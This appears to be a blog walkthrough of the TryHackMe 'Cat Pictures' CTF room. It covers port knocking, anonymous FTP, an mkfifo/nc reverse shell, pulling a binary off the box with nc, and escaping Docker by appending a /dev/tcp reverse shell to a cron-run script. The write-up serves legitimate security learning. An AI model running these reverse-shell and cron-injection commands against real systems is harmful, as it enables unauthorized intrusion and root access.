<!doctype html><html lang=en><head><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content="ie=edge"><meta name=viewport content="width=device-width,initial-scale=1"><meta name=mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-capable content="yes"><meta name=application-name content><meta name=apple-mobile-web-app-status-bar-style content="#fff"><meta name=apple-mobile-web-app-title content><title>Cat Pictures Writeup | TryHackMe -
</title><link rel=alternate href=https://h4r1337.github.io/posts/cat-pictures/ hreflang=en><link rel=canonical href=https://h4r1337.github.io/posts/cat-pictures/><link rel=next href=https://h4r1337.github.io/posts/simple-ctf/><meta name=description content="In this easy box, we have to use a technique called Port Knocking to open an anonymous ftp service. And then using the credentials got from the ftp server, we will get access to a very limited shell. From there we will use mkfifo to upgrade the shell. After that we have to reverse a simple binary file to get the password to run that binary, which will give us a ssh private key. We will use that to SSH into a docker instance running on the box. For reading the final root flag we will modify a script to run a revese shell, which is called by a cronjob."><meta name=keywords content="THM,tryhackme,Writeup,Walkthrough,Cat Pictures,Port Knocking,Docker,Beginners"><meta property="og:url" content="https://h4r1337.github.io/posts/cat-pictures/"><meta property="og:site_name" content="h4r1337 blog | CTF writeups"><meta property="og:title" content="Cat Pictures Writeup | TryHackMe"><meta property="og:description" content="In this easy box, we have to use a technique called Port Knocking to open an anonymous ftp service. And then using the credentials got from the ftp server, we will get access to a very limited shell. From there we will use mkfifo to upgrade the shell. After that we have to reverse a simple binary file to get the password to run that binary, which will give us a ssh private key. We will use that to SSH into a docker instance running on the box. For reading the final root flag we will modify a script to run a revese shell, which is called by a cronjob."><meta property="og:locale" content="en"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2022-07-07T11:36:39+05:30"><meta property="article:modified_time" content="2022-07-07T11:36:39+05:30"><meta property="article:tag" content="TryHackMe"><meta property="article:tag" content="Writeup"><meta property="article:tag" content="Port-Knocking"><meta property="article:tag" content="Mkfifo"><meta property="article:tag" content="Docker"><meta property="og:image" content="https://h4r1337.github.io/img/cat-pictures/cover.webp"><meta property="og:see_also" content="https://h4r1337.github.io/posts/airplane/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/simple-ctf/"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://h4r1337.github.io/img/cat-pictures/cover.webp"><meta name=twitter:title content="Cat Pictures Writeup | TryHackMe"><meta name=twitter:description content="In this easy box, we have to use a technique called Port Knocking to open an anonymous ftp service. And then using the credentials got from the ftp server, we will get access to a very limited shell. From there we will use mkfifo to upgrade the shell. After that we have to reverse a simple binary file to get the password to run that binary, which will give us a ssh private key. We will use that to SSH into a docker instance running on the box. For reading the final root flag we will modify a script to run a revese shell, which is called by a cronjob."><meta name=referrer content="no-referrer-when-downgrade"><link rel=apple-touch-icon sizes=180x180 href=/favicons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicons/favicon-16x16.png><link rel=manifest href=/favicons/site.webmanifest><link rel=mask-icon href=/favicons/safari-pinned-tab.svg color=#5bbad5><meta name=apple-mobile-web-app-title content="Jekyll Klise"><meta name=application-name content="Jekyll Klise"><meta name=msapplication-TileColor content="#da532c"><meta name=theme-color content="#2c2c2c"><link href=https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css rel=stylesheet><link rel=stylesheet href=/sass/main.min.2480d733c3cd78de5d135eb2d8c0b0f964b2bf1e047d180f4f363bdcc3b23b20.css integrity="sha256-JIDXM8PNeN5dE16y2MCw+WSyvx4EfRgPTzY73MOyOyA="><link rel=stylesheet href=/lib/fontawesome-free/all.min.e5e202e3c899507992952533f57b634722b69b34241d271963559d31aa33ef81.css integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E="></head><body data-theme=dark class=notransition><script>const body=document.body,data=body.getAttribute("data-theme"),initTheme=e=>{e==="dark"?body.setAttribute("data-theme","dark"):e==="light"?body.removeAttribute("data-theme"):localStorage.setItem("theme",data)};initTheme(localStorage.getItem("theme")),setTimeout(()=>body.classList.remove("notransition"),75)</script><script id=partial/analytics.html data-goatcounter=https://h4r1337-blog.goatcounter.com/count async src=//gc.zgo.at/count.js></script><div class=navbar role=navigation><nav class=menu><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg width="24" height="24" viewBox="0 0 512 512"><path d="M64 384H448V341.33H64zm0-106.67H448V234.67H64zM64 128v42.67H448V128z"/></svg>
</span></label><a id=mode href=#><svg class="mode-sunny" width="24" height="24" viewBox="0 0 512 512"><title>LIGHT</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg><svg class="mode-moon" width="24" height="24" viewBox="0 0 512 512"><title>DARK</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg></a><div class=trigger><div class=trigger-container><a class=menu-link href=/ title=home>home
</a><a class=menu-link href=/posts title=posts>posts
</a><a class=menu-link href=/series title=series>series
</a><a class=menu-link href=/resume.pdf title=resume>resume
</a><a class=menu-link href=/whoami title=whoami>whoami
</a><a class="menu-link rss" href=/index.xml><svg width="17" height="17" viewBox="0 0 512 512" fill="#ed812e"><title>RSS</title><path d="M108.56 342.78a60.34 60.34.0 1060.56 60.44 60.63 60.63.0 00-60.56-60.44z"/><path d="M48 186.67v86.55c52 0 101.94 15.39 138.67 52.11s52 86.56 52 138.67h86.66c0-151.56-125.66-277.33-277.33-277.33z"/><path d="M48 48v86.56c185.25.0 329.22 144.08 329.22 329.44H464C464 234.66 277.67 48 48 48z"/></svg></a></div></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article itemscope itemtype=https://schema.org/BlogPosting><header class=header><div class=tags><span itemprop=keywords><a href=https://h4r1337.github.io/tags/tryhackme/ class=tag>TRYHACKME</a>
,
<a href=https://h4r1337.github.io/tags/writeup/ class=tag>WRITEUP</a>
,
<a href=https://h4r1337.github.io/tags/port-knocking/ class=tag>PORT-KNOCKING</a>
,
<a href=https://h4r1337.github.io/tags/mkfifo/ class=tag>MKFIFO</a>
,
<a href=https://h4r1337.github.io/tags/docker/ class=tag>DOCKER</a></span></div><h1 class=header-title itemprop=headline>Cat Pictures Writeup | TryHackMe</h1><div class=post-meta><time datetime="2022-07-07 11:36:39 +0530 +0530" itemprop=datePublished>2022-07-07
</time><span itemprop=author itemscope itemtype=https://schema.org/Person><span itemprop=name>h4r1337</span>
</span><time hidden datetime="2022-07-07 11:36:39 +0530 +0530" itemprop=dateModified></time>
<span hidden itemprop=publisher itemtype=Person>h4r1337</span>
<span hidden itemprop=mainEntityOfPage>In this easy box, we have to use a technique called Port Knocking to open an anonymous ftp service. And then using the credentials got from the ftp server, we will get access to a very limited shell. From there we will use mkfifo to upgrade the shell. After that we have to reverse a simple binary file to get the password to run that binary, which will give us a ssh private key. We will use that to SSH into a docker instance running on the box. For reading the final root flag we will modify a script to run a revese shell, which is called by a cronjob.</span></div></header><div class=page-content itemprop=articleBody><h2 id=overview><a href=#overview class=anchor-head aria-label=Anchor></a>Overview</h2><ul><li><strong>Name:</strong> <a href=https://tryhackme.com/room/catpictures>Cat Pictures</a></li><li><strong>Difficulty:</strong> Easy</li><li><strong>Description:</strong> I made a forum where you can post cute cat pictures!</li></ul><p>In this easy box, we have to use a technique called <a href=https://en.wikipedia.org/wiki/Port_knocking>Port Knocking</a> to open an
anonymous ftp service. And then using the credentials got from the ftp server, we will get access to a very limited shell.
From there we will use <code>mkfifo</code> to upgrade the shell. After that
we have to reverse a simple binary file to get the password to run that binary, which will give us a ssh private key.
We will use that to SSH into a docker instance running on the box. For reading the final root flag we will modify a script
to run a revese shell, which is called by a cronjob.</p><h2 id=enumeration><a href=#enumeration class=anchor-head aria-label=Anchor></a>Enumeration</h2><p>We can start with an nmap scan:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nmap -sC -sV -vv 10.10.85.194 -oA nmap/initial-scan
</span></span></code></pre></div><br><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>Nmap scan report for 10.10.248.153
</span></span><span style=display:flex><span>Host is up (0.048s latency).
</span></span><span style=display:flex><span>Scanned at 2022-07-07 12:06:05 IST for 3060s
</span></span><span style=display:flex><span>Not shown: 65424 closed ports, 108 filtered ports
</span></span><span style=display:flex><span>PORT     STATE SERVICE      REASON  VERSION
</span></span><span style=display:flex><span>22/tcp   open     ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
</span></span><span style=display:flex><span>| ssh-hostkey:
</span></span><span style=display:flex><span>|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
</span></span><span style=display:flex><span>|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
</span></span><span style=display:flex><span>|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
</span></span><span style=display:flex><span>4420/tcp open     nvm-express?
</span></span><span style=display:flex><span>| fingerprint-strings:
</span></span><span style=display:flex><span>|   DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
</span></span><span style=display:flex><span>|     INTERNAL SHELL SERVICE
</span></span><span style=display:flex><span>|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
</span></span><span style=display:flex><span>|     ctrl-c
</span></span><span style=display:flex><span>|     Please enter password:
</span></span><span style=display:flex><span>|     Invalid password...
</span></span><span style=display:flex><span>|     Connection Closed
</span></span><span style=display:flex><span>|   NULL, RPCCheck:
</span></span><span style=display:flex><span>|     INTERNAL SHELL SERVICE
</span></span><span style=display:flex><span>|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
</span></span><span style=display:flex><span>|     ctrl-c
</span></span><span style=display:flex><span>|_    Please enter password:
</span></span><span style=display:flex><span>8080/tcp open     http         Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
</span></span><span style=display:flex><span>| http-methods:
</span></span><span style=display:flex><span>|_  Supported Methods: GET HEAD POST OPTIONS
</span></span><span style=display:flex><span>| http-open-proxy: Potentially OPEN proxy.
</span></span><span style=display:flex><span>|_Methods supported:CONNECTION
</span></span><span style=display:flex><span>|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
</span></span><span style=display:flex><span>|_http-title: Cat Pictures - Index page
</span></span></code></pre></div><p>As we can see 3 ports are open:</p><ul><li>22/tcp -> ssh</li><li>4420/tcp -> ???</li><li>8080/tcp -> http</li></ul><h3 id=port-4420----internal-shell-service><a href=#port-4420----internal-shell-service class=anchor-head aria-label=Anchor></a>Port 4420 &ndash; INTERNAL SHELL SERVICE</h3><p>From the above nmap scan we found there is an unusual port (<code>4420/tcp</code>) is open. So let&rsquo;s check that one first.
We can use <code>nc</code> to find out what service is running on that port.</p><img src=/img/cat-pictures/port-4420.webp alt="Port 4420" style=zgotmplz><p>We need a password for accessing the <kbd>INTERNAL SHELL SERVICE</kbd>. Leave this for later&mldr;</p><h3 id=phpbb><a href=#phpbb class=anchor-head aria-label=Anchor></a>phpBB</h3><img src=/img/cat-pictures/phpbb.webp alt=phpBB style=zgotmplz><p>Port 8080 is hosting a <a href=https://www.phpbb.com>phpBB forum</a>. After playing around with it a bit, I found that there is only
one user named <code>user</code>.
Who is likely to be the admin. Account registration doesn&rsquo;t work properly.</p><img src=/img/cat-pictures/auth-error.webp alt="port fairy" style=zgotmplz><p>And no other known phpBB attacks work, but account
login seems working fine -> password bruteforce?</p><img src=/img/cat-pictures/knock-knock-hint.webp alt="port knocking hint" style=zgotmplz><p>There was only one post, which gives us a hint about port knocking. But at the time of solving I didn&rsquo;t know about port
knocking and, it took me some time to realise (I mean, got help :P ).</p><h2 id=port-knocking><a href=#port-knocking class=anchor-head aria-label=Anchor></a>Port Knocking</h2><img src=/img/cat-pictures/port-knocking-help.webp alt="port fairy" style=zgotmplz><p><a href=https://en.wikipedia.org/wiki/Port_knocking>Port knocking</a> was some new technique to me. It took me some time to get that,
Well thanks @pood and @FluffMe from TryHackMe discord for this hint :)
Before moving forward you must have to do some google-fu to understand what is port knocking. Here is a reference if you
want to know more about port knocking:
<a href=https://sushant747.gitbooks.io/total-oscp-guide/content/port_knocking.html>port knocking</a></p><p>Basically port knocking is a way to hide a specific port from an attacker. We can define some rules to open a port
only if we knock some other ports in a specific order. Here knock means to send some TCP packets with SYN flag. If we knock
the ports in the same order defined by the server, the hidden port will open.</p><p>So we have to knock on each port given in that forum and, it will open another port that was filtered or closed before.
We can do this with <code>bash</code> and <code>nc</code> or we can install a tool called <code>knockd</code> which is available on ubuntu by default. If
not, you can download it by running:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>sudo apt-get install knockd
</span></span></code></pre></div><p>The magic numbers listed in the phpBB forum are ports to knock to open a filtered port. We can knock ports by using
different methods:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span><span style=color:#928374;font-style:italic># With knockd</span>
</span></span><span style=display:flex><span>sudo apt-get install knockd
</span></span><span style=display:flex><span>knock 10.10.85.194 <span style=color:#d3869b>1111</span> <span style=color:#d3869b>2222</span> <span style=color:#d3869b>3333</span> <span style=color:#d3869b>4444</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># With nc</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>for</span> P in <span style=color:#d3869b>1111</span> <span style=color:#d3869b>2222</span> <span style=color:#d3869b>3333</span> 4444; <span style=color:#fe8019>do</span> nc -vz 10.10.85.194 $P ;<span style=color:#fe8019>done</span>
</span></span></code></pre></div><p>After port knocking we have to port scan the target once more to view the revealed port.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nmap -T4 10.10.85.194
</span></span></code></pre></div><br><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Starting Nmap 7.80 <span style=color:#fe8019>(</span> https://nmap.org <span style=color:#fe8019>)</span> at 2022-07-07 15:22 IST
</span></span><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> 10.10.85.194
</span></span><span style=display:flex><span>Host is up <span style=color:#fe8019>(</span>0.51s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Not shown: <span style=color:#d3869b>997</span> closed ports
</span></span><span style=display:flex><span>PORT     STATE SERVICE
</span></span><span style=display:flex><span>21/tcp   open  ftp
</span></span><span style=display:flex><span>22/tcp   open  ssh
</span></span><span style=display:flex><span>8080/tcp open  http-proxy
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Nmap <span style=color:#fe8019>done</span>: <span style=color:#d3869b>1</span> IP address <span style=color:#fe8019>(</span><span style=color:#d3869b>1</span> host up<span style=color:#fe8019>)</span> scanned in 44.51 seconds
</span></span></code></pre></div><p>We can see that the port 21, <code>ftp</code> is open now.</p><h2 id=ftp-discovery><a href=#ftp-discovery class=anchor-head aria-label=Anchor></a>FTP Discovery</h2><p>If we found an open <strong>FTP</strong> service, first things to do is to check for anonymous login. We can check this by:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>ftp anonymous@10.10.85.194
</span></span></code></pre></div><br><img src=/img/cat-pictures/ftp.webp alt="FTP anonymous login" style=zgotmplz><p>Success!!! Anonymous login is enabled. There is only one file available <code>note.txt</code> which probably contains the password for
the <code>INTERNAL SHELL SERVICE</code>. Trust me CTFs are kinda predictable 😂.</p><p>As I said:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>In case I forget my password, I&#39;m leaving a pointer to the internal 
</span></span><span style=display:flex><span>shell service on the server.
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Connect to port 4420, the password is *********.
</span></span><span style=display:flex><span>- catlover
</span></span></code></pre></div><h2 id=initial-access----internal-shell-service><a href=#initial-access----internal-shell-service class=anchor-head aria-label=Anchor></a>Initial Access &ndash; INTERNAL SHELL SERVICE</h2><img src=/img/cat-pictures/got-access-to-internal-shell.webp alt="Port 4420" style=zgotmplz><p>As we now have the password, we can get inside the <code>INTERNAL SHELL SERVICE</code> running on port 4420.</p><img src=/img/cat-pictures/port-4420-commands-available.webp alt="Commands available" style=zgotmplz><p>As you can see here we only have these binaries available in this limited shell. But most interestingly we have an
<code>mkfifo</code> binary available, which we can use to upgrade our shell.</p><p><em><strong>NOTE: You can&rsquo;t go ahead without upgrading the shell.</strong></em></p><p>Lets checkout <a href=https://www.revshells.com>revshells.com</a> for <code>mkfifo</code> and <code>nc</code> reverse shell.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span><span style=color:#928374;font-style:italic># your machine</span>
</span></span><span style=display:flex><span>nc -lvnp port
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># target machine</span>
</span></span><span style=display:flex><span>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc your_vpn_ip port &gt;/tmp/f
</span></span></code></pre></div><br><img src=/img/cat-pictures/mkfifo-rev-shell.webp alt="rev shell recieved" style=zgotmplz><p>After checking out the home directory, I found out a wierd <code>runme</code> located under the user <strong>catlover</strong>. Tried running it
but, it also requires a password to run.</p><p><em><strong>NOTE: As I said earlier, to run the <code>runme</code> binary we need to upgrade the shell.</strong></em></p><img src=/img/cat-pictures/regular-shell-warning.webp alt="runme not running" style=zgotmplz><p>We need to retrieve that binary to our machine to do some further investigations 🔍.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span><span style=color:#928374;font-style:italic># File transfer using nc</span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># On our machine</span>
</span></span><span style=display:flex><span>nc -lp port &gt; runme
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># On target machine</span>
</span></span><span style=display:flex><span>nc -w <span style=color:#d3869b>3</span> your-vpn-ip port &lt; /home/catlover/runme
</span></span></code></pre></div><p>We can use the <code>strings</code> command for retrieving printable characters in the binary file, and hope the password is
there.</p><img src=/img/cat-pictures/strings-runme.webp alt="strings runme" style=zgotmplz><p>This one looks like a password. After trying, I can confirm that is the valid password. Now we can use the password to run
the binary. This <code>runme</code> binary gives us an SSH private key in the directory where the binary exists,
which we can then use to SSH into the catlover user.</p><p>We have to retrieve the <code>id_rsa</code> file we got, set the permission, and SSH into the user.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>chmod <span style=color:#d3869b>600</span> id_rsa
</span></span><span style=display:flex><span>ssh catlover@catpictures.thm -i id_rsa
</span></span></code></pre></div><br><img src=/img/cat-pictures/ssh-success.webp alt="SSH success" style=zgotmplz><h2 id=privilage-escalation----escape-docker><a href=#privilage-escalation----escape-docker class=anchor-head aria-label=Anchor></a>Privilage Escalation &ndash; Escape Docker</h2><p>Now that we have logged in, let&rsquo;s read the first flag</p><img src=/img/cat-pictures/user-flag.webp alt="user flag" style=zgotmplz><p>It shows that we are root but actually, we are not root. We are inside a docker container and we have to exit that to get
the final flag.</p><img src=/img/cat-pictures/docker-confirm.webp alt="Docke confirmed" style=zgotmplz><p>So how to escape the docker container and read the final flag? You will get a hint if you tried running <code>history</code>.</p><img src=/img/cat-pictures/history.webp alt="history output" style=zgotmplz><p>There is a cron job that is running on the machine which executes the <code>clean.sh</code> file. We have to inject a reverse shell
inside that file to get the actual root.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span><span style=color:#928374;font-style:italic># your machine</span>
</span></span><span style=display:flex><span>nc -lnvp <span style=color:#d3869b>9999</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># Target machine</span>
</span></span><span style=display:flex><span><span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#39;bash -i &gt;&amp; /dev/tcp/your-vpn-ip/9999 0&gt;&amp;1&#39;</span> &gt;&gt; /opt/clean/clean.sh 
</span></span></code></pre></div><p>Now we can read the final root flag and end the machine.</p><img src=/img/cat-pictures/root-flag.webp alt="root flag" style=zgotmplz><hr><p>This box is a good example of why is it hard to make an easy ctf challenge :). From
this box I learned about port knocking, which I can probably use for other CTFs.</p></div></article></main><aside id=sticky-top><div class=toc-title><p>Cat Pictures Writeup | TryHackMe</p><hr id=toc-hr></div><nav id=toc class=toc-container><nav id=TableOfContents><ul><li><a href=#overview>Overview</a></li><li><a href=#enumeration>Enumeration</a><ul><li><a href=#port-4420----internal-shell-service>Port 4420 &ndash; INTERNAL SHELL SERVICE</a></li><li><a href=#phpbb>phpBB</a></li></ul></li><li><a href=#port-knocking>Port Knocking</a></li><li><a href=#ftp-discovery>FTP Discovery</a></li><li><a href=#initial-access----internal-shell-service>Initial Access &ndash; INTERNAL SHELL SERVICE</a></li><li><a href=#privilage-escalation----escape-docker>Privilage Escalation &ndash; Escape Docker</a></li></ul></nav></nav></aside><small class=post-updated-at>updated at 2022-07-07</small><hr><div class=series-nav><div class="alert alert-note"><div class=alert-heading-box><a href=https://h4r1337.github.io/series/try-hack-me/><p class=alert-heading>Try Hack Me Series</p></a></div></div><nav class=post-nav style=margin-top:1rem;border-top:none><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/simple-ctf/><div class=nav-arrow>Next in series</div><span class=post-title>Simple CTF | TryHackMe</span></a></nav></div><nav class=post-nav><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/simple-ctf/><div class=nav-arrow>Next</div><span class=post-title>Simple CTF | TryHackMe</span></a></nav></div><footer class=footer><a class=footer_item href=javascript::void(0)>resume</a>
<a class=footer_item href=/index.xml>rss</a>
<span class=footer_item>&copy; 2026</span>
<small class=footer_copyright><a href=https://github.com/h4r1337/hugo-klise target=_blank rel="noreferrer noopener">hugo-klisé</a>
theme on
<a href=https://gohugo.io target=_blank rel="noreferrer noopener">Hugo</a><br><span>Made by <a href=https://github.com/h4r1337 target=_blank rel="noreferrer noopener">h4r1337</a></span></small></footer><script src=/js/main.js defer></script><script src=/js/toc.js defer></script></body></html>